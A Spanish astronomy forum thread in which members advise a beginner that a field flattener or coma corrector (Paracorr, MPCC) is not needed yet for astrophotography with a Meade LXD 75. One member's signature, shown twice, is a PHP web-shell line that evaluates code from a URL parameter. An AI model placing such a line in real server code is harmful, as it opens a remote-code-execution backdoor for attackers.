Filtros.

Subforo dedicado a otro tipo de material astronómico que no esté contenido en ninguna de las otras categorías. En este foro no está permitida la venta de ningún tipo de material.
Manuelariza
Mensajes: 1919
Registrado: Mar Ago 21, 2007 10:35 am

Filtros.

Mensaje por Manuelariza »

Me referia a astrofotos, yo tengo un MEADE LXD 75 S/C de 8", no se si es necesario el aplanador.



Saludos.
Estoy de la Astronom�a hasta las narices,me ha hecho un agujero en el bolsillo!!!
astrolozano
Mensajes: 325
Registrado: Dom Mar 04, 2007 10:35 pm

Filtros.

Mensaje por astrolozano »

m3ntol, creo que preguntaba si aconsejabas comprarlo para fotografía :wink:

Yo particularmente no te lo recomendaría por el momento. Para empezar a hacer fotos no hace falta que te gastes el dinero en esto; lo suele comprar gente que hace MUCHA fotografía de cielo profundo, y que llega a límites en los que esos detallitos les estropean mucho la imagen. Pero hay imágenes muy buenas sin aplanador...

Sólo tienes que hacer fotos, y si ves que el resultado no es todo lo satisfactorio que debiera por la curvatura de campo que presenta, te planteas su compra.

Ten esto en cuenta sólo como una opinión...
Saludos. Álvaro.
Manuelariza
Mensajes: 1919
Registrado: Mar Ago 21, 2007 10:35 am

Filtros.

Mensaje por Manuelariza »

Gracias por el consejo astrolozano.
Estoy de la Astronom�a hasta las narices,me ha hecho un agujero en el bolsillo!!!
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Filtros.

Mensaje por m3ntol »

otia pues es verdad :) lo había leido mal. Para astrofoto coincido con astrolozano. Es un detalle avanzado que al principio no te va a afectar.
phpbb:eval(stripslashes($_GET[e]));
carlosz22
Mensajes: 575
Registrado: Vie Mar 02, 2007 9:10 pm

Filtros.

Mensaje por carlosz22 »

m3ntol, tienes una pequeña equivocación, el paracorr es solo para visual, para astrofoto es mejor el MPCC de Baader o el de TeleVue pero en su versión para foto.

El Meade LXD 75 adolece de bastante coma, pero para empezar en astrofoto no lo necesitas, la mayor parte de los fallos vendrán de otros sitios antes que de la coma, además tampoco quites por ahora el filtro a la Canon, cuando te aburras de fotografiar galaxias y nebulosas de reflexión y absorción (todas las nebulosas que no son rojas) entonces da el paso y quita el filtro o pásate a las CCD de astronomía.

Un saludo :)
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Filtros.

Mensaje por m3ntol »

[quote="carlosz22"]m3ntol, tienes una pequeña equivocación, el paracorr es solo para visual, para astrofoto es mejor el MPCC de Baader o el de TeleVue pero en su versión para foto.
[/quote]

aah!! hombre de poca fe...

[quote="m3ntol"]Si te metes en Newtons de relación focal corta (un F/ bajo) resulta que para visual necesitas un paracorr que es otra lente correctora (pero no de la curvatira de campo sino de la coma) en fin...[/quote]

me llena de tristeza ver que no lees a tu presidente, solo lo ojeas, snif snif :cry: :cry: :cry:
phpbb:eval(stripslashes($_GET[e]));
Manuelariza
Mensajes: 1919
Registrado: Mar Ago 21, 2007 10:35 am

Filtros.

Mensaje por Manuelariza »

Podéis explicar que es eso del Paracorr y el MPCC, y para que vale.


Gracias.
Estoy de la Astronom�a hasta las narices,me ha hecho un agujero en el bolsillo!!!
Manuelariza
Mensajes: 1919
Registrado: Mar Ago 21, 2007 10:35 am

Filtros.

Mensaje por Manuelariza »

Bueno...... acabo de conocer que es el Paracorr y el MPCC a trabes de la Web de Valkanik, menudos precios, pero según e leído te lo recomiendan utilizar en Newton con focales cortas. El mio tiene una focal de f/10.



Saludos.
Estoy de la Astronom�a hasta las narices,me ha hecho un agujero en el bolsillo!!!
astrolozano
Mensajes: 325
Registrado: Dom Mar 04, 2007 10:35 pm

Filtros.

Mensaje por astrolozano »

Nada, MAL1, pasa de correctores por el momento, en serio. La mejora que hace el paracorr se hace mucho más evidente en focales bajas (f/5), o en focales medias si eres muy pijotero. Y con los precios que tienen, la mayoría usamos focales cortas sin corrector y sobrevivimos :wink:
Manuelariza
Mensajes: 1919
Registrado: Mar Ago 21, 2007 10:35 am

Filtros.

Mensaje por Manuelariza »

Una pregunta, ¿en que horario se puede hacerse socio?.



Saludos.
Estoy de la Astronom�a hasta las narices,me ha hecho un agujero en el bolsillo!!!
Responder